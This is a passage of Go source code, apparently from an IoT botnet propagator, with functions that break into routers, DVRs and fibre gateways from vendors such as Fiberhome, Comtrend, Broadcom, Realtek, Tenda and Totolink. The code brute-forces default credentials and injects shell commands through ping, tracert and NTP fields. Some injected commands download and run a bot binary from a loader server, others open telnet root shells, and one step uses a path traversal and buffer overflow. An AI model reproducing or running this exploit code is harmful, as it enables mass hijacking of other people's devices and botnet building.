zeroByte(tmp)
1406
zeroByte(buf)
1407
1408
conn.Close()
1409
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1410
if err != nil {
1411
time.Sleep(10 * time.Second)
1412
return
1413
}
1414
1415
buf = make([]byte, 0, 8096)
1416
tmp = make([]byte, 256)
1417
1418
fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n")
1419
for {
1420
n, err := conn.Read(tmp)
1421
if err != nil {
1422
break
1423
}
1424
1425
buf = append(buf, tmp[:n]...)
1426
}
1427
1428
pids := strings.Split(string(buf), "\n")
1429
for i := 0; i < len(pids); i++ {
1430
if i >= 128 {
1431
break
1432
}
1433
1434
if len(pids[i]) < 38 {
1435
continue
1436
}
1437
1438
if _, err := strconv.Atoi(pids[i][33:34]); err != nil {
1439
continue
1440
}
1441
1442
pidstr := pids[i][33:38]
1443
if _, err := strconv.Atoi(pidstr[0:1]); err == nil {
1444
if _, err := strconv.Atoi(pidstr[1:2]); err == nil {
1445
if _, err := strconv.Atoi(pidstr[2:3]); err == nil {
1446
if _, err := strconv.Atoi(pidstr[3:4]); err == nil {
1447
if _, err := strconv.Atoi(pidstr[4:5]); err == nil {
1448
if len(pidstr[0:]) >= 5 {
1449
pidStrs[pidsFound] = pidstr[0:5]
1450
pidsFound++
1451
continue
1452
}
1453
} else {
1454
if len(pidstr[0:]) >= 4 {
1455
pidStrs[pidsFound] = pidstr[0:4]
1456
pidsFound++
1457
continue
1458
}
1459
}
1460
} else {
1461
if len(pidstr[0:]) >= 3 {
1462
pidStrs[pidsFound] = pidstr[0:3]
1463
pidsFound++
1464
continue
1465
}
1466
}
1467
} else {
1468
if len(pidstr[0:]) >= 2 {
1469
pidStrs[pidsFound] = pidstr[0:2]
1470
pidsFound++
1471
continue
1472
}
1473
}
1474
} else {
1475
if len(pidstr[0:]) >= 1 {
1476
pidStrs[pidsFound] = pidstr[0:1]
1477
pidsFound++
1478
continue
1479
}
1480
}
1481
}
1482
1483
pidstr = ""
1484
}
1485
1486
zeroByte(buf)
1487
zeroByte(tmp)
1488
1489
if pidsFound <= 5 {
1490
conn.Close()
1491
time.Sleep(10 * time.Second)
1492
return
1493
}
1494
1495
conn.Close()
1496
1497
for i := pidsFound; i > 1; i-- {
1498
retval := ucSofiaCheck(target, pidStrs[i])
1499
if retval == -1 {
1500
continue
1501
}
1502
1503
retval = ucGuessSmaps(target, pidStrs[i])
1504
if retval == -1 {
1505
continue
1506
}
1507
1508
stackOffset := retval + 0x7fd3d8 + 20
1509
ucSendBof(target, stackOffset)
1510
break
1511
}
1512
1513
for i := 0; i < pidsFound; i++ {
1514
pidStrs[i] = ""
1515
}
1516
1517
zeroByte(buf)
1518
zeroByte(tmp)
1519
time.Sleep(10 * time.Second)
1520
return
1521
}
1522
1523
func infectFunctionTvt(target string) {
1524
1525
var rdbuf []byte = []byte("")
1526
1527
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1528
if err != nil {
1529
return
1530
}
1531
1532
/* TVT4567 check */
1533
go func() {
1534
ipslit := strings.Split(target, ":")
1535
tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":4567", 10 * time.Second)
1536
if err == nil {
1537
infectFunctionTvt4567(tmpconn)
1538
}
1539
1540
return
1541
} ()
1542
/* ////////////// */
1543
1544
payload := "<?xml version=\"1.0\" encoding=\"utf-8\"?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\"filterTypeMode\">refuse</filterType><filterList type=\"list\"><itemType><addressType type=\"addressType\"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$("
1545
payload += tvtWebPayload
1546
payload += ")</ip></item></filterList></content></request>"
1547
1548
cntlen := strconv.Itoa(len(payload))
1549
1550
conn.Write([]byte("POST /editBlackAndWhiteList HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: " + cntlen + "\r\nAccept-Language: en-us\r\nHost: " + target + "\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\nConnection: close\r\nCache-Control: max-age=0\r\nContent-Type: text/xml\r\nAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=\r\n\r\n" + payload + "\r\n\r\n"))
1551
1552
for {
1553
tmpbuf := make([]byte, 128)
1554
ln, err := conn.Read(tmpbuf)
1555
if ln <= 0 || err != nil {
1556
break
1557
}
1558
1559
rdbuf = append(rdbuf, tmpbuf...)
1560
if strings.Contains(string(rdbuf), "<status>success</status>") {
1561
fmt.Printf("\x1b[38;5;46mTvt\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
1562
payloadSent++
1563
break
1564
}
1565
}
1566
1567
conn.Close()
1568
time.Sleep(10 * time.Second)
1569
}
1570
1571
func infectFunctionFiberhome(target string) {
1572
1573
var (
1574
rdbuf []byte = []byte("")
1575
authed int = 0
1576
telnetPort int = 0
1577
)
1578
1579
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1580
if err != nil {
1581
return
1582
}
1583
1584
conn.Write([]byte("POST /goform/webLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 23\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/login_inter.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nUser=admin&Passwd=admin\r\n\r\n"))
1585
1586
for {
1587
tmpbuf := make([]byte, 128)
1588
ln, err := conn.Read(tmpbuf)
1589
if ln <= 0 || err != nil {
1590
break
1591
}
1592
1593
rdbuf = append(rdbuf, tmpbuf...)
1594
if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") {
1595
authed = 1
1596
break
1597
}
1598
}
1599
1600
conn.Close()
1601
1602
if authed == 0 {
1603
return
1604
}
1605
1606
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1607
if err != nil {
1608
return
1609
}
1610
1611
conn.Write([]byte("GET /menu_inter.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://" + target + "/login_inter.asp\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
1612
1613
for {
1614
tmpbuf := make([]byte, 128)
1615
ln, err := conn.Read(tmpbuf)
1616
if ln <= 0 || err != nil {
1617
break
1618
}
1619
1620
rdbuf = append(rdbuf, tmpbuf...)
1621
1622
if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") {
1623
authed = 1
1624
break
1625
}
1626
}
1627
1628
conn.Close()
1629
1630
if fiberRandPort == 1 {
1631
rand.Seed(time.Now().UnixNano())
1632
telnetPort = rand.Intn(50000) + 10000
1633
} else {
1634
telnetPort = fiberStaticPort
1635
}
1636
1637
for i := 0; i < len(fiberSecStrs); i++ {
1638
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1639
if err != nil {
1640
return
1641
}
1642
1643
conn.Write([]byte("GET /goform/setPing?ping_ip=;telnetd%20-l/bin/sh%20-p" + strconv.Itoa(telnetPort) + "&requestNum=" + strconv.Itoa(i + 1) + "&diagtype=1&" + fiberSecStrs[i] + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\n\r\n"))
1644
1645
tmpbuf := make([]byte, 128)
1646
ln, err := conn.Read(tmpbuf)
1647
if ln <= 0 || err != nil {
1648
conn.Close()
1649
break
1650
}
1651
1652
conn.Close()
1653
1654
if !strings.Contains(string(rdbuf), "200 OK") {
1655
return
1656
}
1657
}
1658
1659
time.Sleep(3 * time.Second)
1660
1661
ipslit := strings.Split(target, ":")
1662
conn, err = net.DialTimeout("tcp", ipslit[0] + ":" + strconv.Itoa(telnetPort), 10 * time.Second)
1663
if err == nil {
1664
fmt.Printf("\x1b[38;5;46mFiberhome\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m telnet shell opened\x1b[38;5;15m\r\n", target)
1665
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderFiberhomeTag)
1666
conn.Close()
1667
}
1668
1669
return
1670
}
1671
1672
func infectFunctionVigor(target string) {
1673
1674
var rdbuf []byte = []byte("")
1675
1676
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1677
if err != nil {
1678
return
1679
}
1680
1681
payload := "action=login&keyPath=%27%0A%09%2F"
1682
payload += vigorPayload
1683
payload += "%27%0A%09%27&loginPwd=a&loginUser=a"
1684
cntlen := strconv.Itoa(len(payload))
1685
1686
conn.Write([]byte("POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n" + payload + "\r\n\r\n"))
1687
1688
for {
1689
tmpbuf := make([]byte, 128)
1690
ln, err := conn.Read(tmpbuf)
1691
if ln <= 0 || err != nil {
1692
break
1693
}
1694
1695
rdbuf = append(rdbuf, tmpbuf...)
1696
if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") {
1697
fmt.Printf("\x1b[38;5;46mVigor\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
1698
payloadSent++
1699
break
1700
}
1701
}
1702
1703
conn.Close()
1704
}
1705
1706
func infectFunctionComtrend(target string) {
1707
1708
var (
1709
rdbuf []byte = []byte("")
1710
state = 0
1711
sessionKey = "null"
1712
)
1713
1714
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1715
if err != nil {
1716
return
1717
}
1718
1719
conn.Write([]byte("GET /pingview.cmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/left.html\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
1720
1721
for {
1722
tmpbuf := make([]byte, 128)
1723
ln, err := conn.Read(tmpbuf)
1724
if ln <= 0 || err != nil {
1725
break
1726
}
1727
1728
rdbuf = append(rdbuf, tmpbuf...)
1729
if strings.Contains(string(rdbuf), "&sessionKey=") && strings.Contains(string(rdbuf), "var code = 'location=") && state != 1 {
1730
sessionKey = getStringInBetween(string(rdbuf), " loc += '&sessionKey=", "';\n}\n\nvar code = 'location=\"' + loc + '\"';\n")
1731
1732
if sessionKey == "null" {
1733
break
1734
}
1735
1736
conn.Close()
1737
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1738
if err != nil {
1739
return
1740
}
1741
1742
conn.Write([]byte("GET /ping.cgi?pingIpAddress=;cd%20/mnt;wget%20http://" + loaderDownloadServer + "/multi/wget.sh%20-O-%20>sfs;chmod%20777%20sfs;sh%20sfs%20" + loaderComtrendTag + ";&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/ping.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
1743
state = 1
1744
} else if state == 1 {
1745
if strings.Contains(string(rdbuf), "function btnPing()") {
1746
fmt.Printf("\x1b[38;5;46mComtrend\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
1747
payloadSent++
1748
conn.Close()
1749
return
1750
}
1751
}
1752
}
1753
1754
conn.Close()
1755
}
1756
1757
func infectFunctionGponFiber(target string) {
1758
1759
var (
1760
rdbuf []byte = []byte("")
1761
logins []string = []string{"user:user", "adminisp:adminisp", "admin:stdONU101"}
1762
stage = 0
1763
)
1764
1765
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1766
if err != nil {
1767
return
1768
}
1769
1770
for i := 0; i < len(logins); i++ {
1771
loginSplit := strings.Split(logins[i], ":")
1772
1773
conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
1774
if err != nil {
1775
return
1776
}
1777
1778
cntlen := 14
1779
cntlen = len(loginSplit[0])
1780
cntlen = len(loginSplit[1])
1781
1782
conn.Write([]byte("POST /boaform/admin/formLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + strconv.Itoa(cntlen) + "\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/admin/login.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nusername=" + loginSplit[0] + "&psd=" + loginSplit[1] + "\r\n\r\n"))
1783
1784
for {
1785
tmpbuf := make([]byte, 128)
1786
ln, err := conn.Read(tmpbuf)
1787
if ln <= 0 || err != nil {
1788
break
1789
}
1790
1791
rdbuf = append(rdbuf, tmpbuf...)
1792
if strings.Contains(string(rdbuf), "ERROR:bad password!") {
1793
zeroByte(rdbuf)
1794
break
1795
} else if (strings.Contains(string(rdbuf), "HTTP/1.0 302 Moved Temporarily") || strings.Contains(string(rdbuf), "ERROR:you have logined!")) && stage != 1{
1796
conn.Close()
1797
conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
1798
if err != nil {
1799
return
1800
}
1801
1802
payload := "target_addr=%3Brm%20-rf%20/var/tmp/stainfo%3Bwget%20http://" + loaderDownloadServer + loaderBinsLocation + "bot.mips%20-O%20->/var/tmp/stainfo%3Bchmod%20777%20/var/tmp/stainfo%3B/var/tmp/stainfo%20" + loaderGponfiberTag + "&waninf=1_INTERNET_R_VID_"
1803
cntlen := strconv.Itoa(len(payload))
1804
1805
conn.Write([]byte("POST /boaform/admin/formTracert HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nConnection: close\r\nReferer: http://" + target + "/diag_tracert_admin_en.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
1806
stage = 1
1807
zeroByte(rdbuf)
1808
continue
1809
} else if stage == 1 {
1810
if strings.Contains(string(rdbuf), "value=\" OK \"") {
1811
fmt.Printf("\x1b[38;5;46mGponFiber\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, loginSplit[0], loginSplit[1])
1812
conn.Close()
1813
payloadSent++
1814
return
1815
}
1816
}
1817
}
1818
1819
conn.Close()
1820
}
1821
1822
conn.Close()
1823
}
1824
1825
func infectFunctionBroadcomSessionKey(target string, auth string) string {
1826
1827
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1828
if err != nil {
1829
return ""
1830
}
1831
1832
defer conn.Close()
1833
conn.Write([]byte("GET /ping.html HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + auth + "\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/menu.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1834
1835
for {
1836
bytebuf := make([]byte, 256)
1837
rdlen, err := conn.Read(bytebuf)
1838
if err != nil || rdlen <= 0 {
1839
return ""
1840
}
1841
1842
if strings.Contains(string(bytebuf), "pingHost.cmd") && strings.Contains(string(bytebuf), "&sessionKey=") {
1843
index1 := strings.Index(string(bytebuf), "&sessionKey=")
1844
index2 := strings.Index(string(bytebuf)[index1+len("&sessionKey="):], "';")
1845
sessionKey := string(bytebuf)[index1+len("&sessionKey="):index1+len("&sessionKey=")+index2]
1846
return sessionKey
1847
}
1848
}
1849
1850
return ""
1851
}
1852
1853
func infectFunctionBroadcom(target string) {
1854
1855
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1856
if err != nil {
1857
return
1858
}
1859
1860
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nCache-Control: max-age=0\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1861
1862
bytebuf := make([]byte, 64)
1863
rdlen, err := conn.Read(bytebuf)
1864
if err != nil || rdlen <= 0 {
1865
conn.Close()
1866
return
1867
}
1868
1869
conn.Close()
1870
1871
if !strings.Contains(string(bytebuf), "HTTP/1.1 200 Ok\r\nServer: micro_httpd") {
1872
return
1873
}
1874
1875
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1876
if err != nil {
1877
return
1878
}
1879
1880
sessionKey := infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
1881
conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=" + broadcomPayload + "&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1882
1883
bytebuf = make([]byte, 256)
1884
rdlen, err = conn.Read(bytebuf)
1885
if err != nil || rdlen <= 0 {
1886
return
1887
}
1888
1889
conn.Close()
1890
1891
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1892
if err != nil {
1893
return
1894
}
1895
1896
sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
1897
conn.Write([]byte("GET /pingHost.cmd?action=add&targetHostAddress=;ps|sh&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/ping.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1898
1899
bytebuf = make([]byte, 256)
1900
rdlen, err = conn.Read(bytebuf)
1901
if err != nil || rdlen <= 0 {
1902
return
1903
}
1904
1905
conn.Close()
1906
1907
if !strings.Contains(string(bytebuf), "COMPLETED") {
1908
fmt.Printf("\x1b[38;5;46mBroadcom\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, "support", "support")
1909
return
1910
}
1911
1912
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1913
if err != nil {
1914
return
1915
}
1916
1917
sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
1918
conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=time.nist.gov&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1919
1920
bytebuf = make([]byte, 256)
1921
rdlen, err = conn.Read(bytebuf)
1922
if err != nil || rdlen <= 0 {
1923
return
1924
}
1925
1926
conn.Close()
1927
}
1928
1929
func infectFunctionHongdian(target string) {
1930
1931
var (
1932
rdbuf []byte = []byte("")
1933
logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"}
1934
)
1935
1936
for i := 0; i < len(logins); i++ {
1937
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1938
if err != nil {
1939
return
1940
}
1941
1942
authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
1943
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n"))
1944
1945
for {
1946
tmpbuf := make([]byte, 128)
1947
ln, err := conn.Read(tmpbuf)
1948
if ln <= 0 || err != nil {
1949
break
1950
}
1951
1952
rdbuf = append(rdbuf, tmpbuf...)
1953
if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") {
1954
conn.Close()
1955
1956
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1957
if err != nil {
1958
return
1959
}
1960
1961
payload := "op_type=ping&destination=%3B"
1962
payload += hongdianPayload
1963
payload += "&user_options="
1964
cntlen := strconv.Itoa(len(payload))
1965
1966
conn.Write([]byte("POST /tools.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/tools.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
1967
zeroByte(rdbuf)
1968
1969
for {
1970
tmpbuf := make([]byte, 128)
1971
ln, err := conn.Read(tmpbuf)
1972
if ln <= 0 || err != nil {
1973
break
1974
}
1975
1976
rdbuf = append(rdbuf, tmpbuf...)
1977
if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") && strings.Contains(string(rdbuf), "/themes/oem.css") {
1978
fmt.Printf("\x1b[38;5;46mHongdian\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
1979
conn.Close()
1980
payloadSent++
1981
return
1982
}
1983
}
1984
1985
conn.Close()
1986
return
1987
} else if strings.Contains(string(rdbuf), "HTTP/1.1 401 Unauthorized") {
1988
break
1989
}
1990
}
1991
1992
zeroByte(rdbuf)
1993
conn.Close()
1994
}
1995
}
1996
1997
func infectFunctionRealtek(target string) {
1998
1999
var (
2000
rdbuf []byte = []byte("")
2001
logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"}
2002
)
2003
2004
for i := 0; i < len(logins); i++ {
2005
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2006
if err != nil {
2007
return
2008
}
2009
2010
authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
2011
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n"))
2012
2013
for {
2014
tmpbuf := make([]byte, 128)
2015
ln, err := conn.Read(tmpbuf)
2016
if ln <= 0 || err != nil {
2017
break
2018
}
2019
2020
rdbuf = append(rdbuf, tmpbuf...)
2021
if strings.Contains(string(rdbuf), "HTTP/1.1 200") {
2022
conn.Close()
2023
2024
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
2025
if err != nil {
2026
return
2027
}
2028
2029
payload := "submit-url=%2Fsyscmd.htm&sysCmd=ping&sysMagic=&sysCmdType=ping&checkNum=1&sysHost=%3Btelnetd%20-l/bin/sh%20-p31443&apply=Apply&msg=boa.conf%0D%0Amime.types%0D%0A"
2030
cntlen := strconv.Itoa(len(payload))
2031
2032
conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/syscmd.htm\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
2033
zeroByte(rdbuf)
2034
2035
for {
2036
tmpbuf := make([]byte, 128)
2037
ln, err := conn.Read(tmpbuf)
2038
if ln <= 0 || err != nil {
2039
break
2040
}
2041
2042
rdbuf = append(rdbuf, tmpbuf...)
2043
if strings.Contains(string(rdbuf), "Redirect") && strings.Contains(string(rdbuf), "/syscmd.htm") {
2044
time.Sleep(10 * time.Second)
2045
2046
ipslit := strings.Split(target, ":")
2047
tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":31443", 10 * time.Second)
2048
if err == nil {
2049
fmt.Printf("\x1b[38;5;46mRealtek\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
2050
tmpconn.Close()
2051
}
2052
2053
conn.Close()
2054
payloadSent++
2055
return
2056
}
2057
}
2058
2059
conn.Close()
2060
return
2061
} else if strings.Contains(string(rdbuf), "HTTP/1.1 401") {
2062
break
2063
}
2064
}
2065
2066
zeroByte(rdbuf)
2067
conn.Close()
2068
}
2069
}
2070
2071
func infectFunctionTenda(target string) {
2072
2073
var rdbuf []byte = []byte("")
2074
2075
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2076
if err != nil {
2077
return
2078
}
2079
2080
conn.Write([]byte("GET /goform/setUsbUnload/.js?deviceName=A;" + tendaPayload + " HTTP/1.1\r\nHost: " + target + "\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\n\r\n"))
2081
2082
for {
2083
tmpbuf := make([]byte, 128)
2084
ln, err := conn.Read(tmpbuf)
2085
if ln <= 0 || err != nil {
2086
break
2087
}
2088
2089
rdbuf = append(rdbuf, tmpbuf...)
2090
if strings.Contains(string(rdbuf), "HTTP/1.0 200 OK") && strings.Contains(string(rdbuf), "{\"errCode\":0}") {
2091
fmt.Printf("\x1b[38;5;46mTenda\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2092
payloadSent++
2093
break
2094
}
2095
}
2096
2097
conn.Close()
2098
}
2099
2100
func infectFunctionTotolink(target string) {
2101
2102
var (
2103
rdbuf []byte = []byte("")
2104
logins []string = []string{"admin:admin", "admin:Soportehfc", "Soportehfc:Soportehfc", "admin:soportehfc", "soportehfc:soportehfc"}
2105
)
2106
2107
for i := 0; i < len(logins); i++ {
2108
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2109
if err != nil {
2110
return
2111
}
2112
2113
authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
2114
payload := "submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd="
2115
payload += totolinkPayload
2116
cntlen := strconv.Itoa(len(payload))
2117
2118
conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + authStr + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n" + payload + "\r\n\r\n"))
2119
2120
for {
2121
tmpbuf := make([]byte, 128)
2122
ln, err := conn.Read(tmpbuf)
2123
if ln <= 0 || err != nil {
2124
break
2125
}
2126
2127
rdbuf = append(rdbuf, tmpbuf...)
2128
if strings.Contains(string(rdbuf), "Location: http://" + target + "/syscmd.htm") {
2129
